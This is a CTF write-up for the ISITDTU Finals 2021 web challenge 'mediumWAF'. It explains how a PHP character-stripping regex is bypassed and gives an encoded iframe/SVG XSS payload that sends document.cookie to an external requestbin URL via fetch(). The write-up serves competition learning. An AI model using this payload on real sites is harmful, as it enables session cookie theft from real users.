Write-up for all ISITDTU CTF Finals 2021 's web challenges

# Write-up for all ISITDTU CTF Finals 2021 's web challenges ###### Author: `antoinenguyen_09` > View all write-up of another category such as pwn, misc, re, crypto [here](https://github.com/antoinenguyen-09/All_CTF_write-ups/tree/master/ISITDTU%20CTF/2021) ## :memo: TLDR: I supposed to be out of [ISITDTU CTF Finals 2021](https://ctftime.org/event/1537). Howevever, one of my brother @doantung99 said that his team **Jenny Lita** would not join Finals despite they had finished with top 8 in Quals. Because of Covid-19, ISITDTU CTF 2021 finals round couldn't be held at Duy Tan University, while **Jenny Lita** wanted a trip to Danang City :-1: ! That's why I can continue my journey at ISITDTU CTF on behalf of **Jenny Lita** team :D. As I expected, all the challenges in Finals were in a much more higher class than the ones in Quals. ## :rocket: mediumWAF > This challenge is nearly the same as [simpleWAF](https://github.com/antoinenguyen-09/All_CTF_write-ups/tree/master/ISITDTU%20CTF/2021/web/simpleWAF) in Quals, but the author change a little bit in his filter regex. ![](https://i.imgur.com/p00Z4xL.png) [+] [Source](https://github.com/antoinenguyen-09/All_CTF_write-ups/tree/master/ISITDTU%20CTF/2021/web/mediumWAF/source) ### 1. Initial reconnaissance: - Because it is the same as [simpleWAF](https://github.com/antoinenguyen-09/All_CTF_write-ups/tree/master/ISITDTU%20CTF/2021/web/simpleWAF) so that I will reject this reconnaissance step, you can read my [Quals's write-up](https://hackmd.io/ztYmTvY7REyB-o0xMVt2JA) to understand how this challenge works. ### 2. Bypass the regex: - First of all, web app fetch the string input to check whether it has been already url-encoded in the right way. If there are some [HTML entities](https://www.w3schools.com/html/html_entities.asp) in this string, all of them will be turned into common HTML tags through `html_entity_decode` function. It is the same as **simpleWAF** challenge, nothing special. - The distinction is located in this line of code: ```php= $xss = preg_replace('/[\x00-\x1F\x7F-\xFF]/', '', $xss); ``` - The above regex matches a single character in the range between character with hex value `00` and character with hex value `1F`, and in the range between the one with hex value `7F` and `FF`. All the charater in these 2 range are shown as below: ![](https://i.imgur.com/u0DfnS4.png) - Payload: ```htmlembedded= <iframe/srcdoc%3d"%26lt%3bsvg/%26%23x%25006f%3bnload%3dfetch(%27https%3a//requestbin.net/r/5ykwtcc0%3fa%3d%27.concat(document.cookie),{mode%3a%27no-cors%27})>"> ```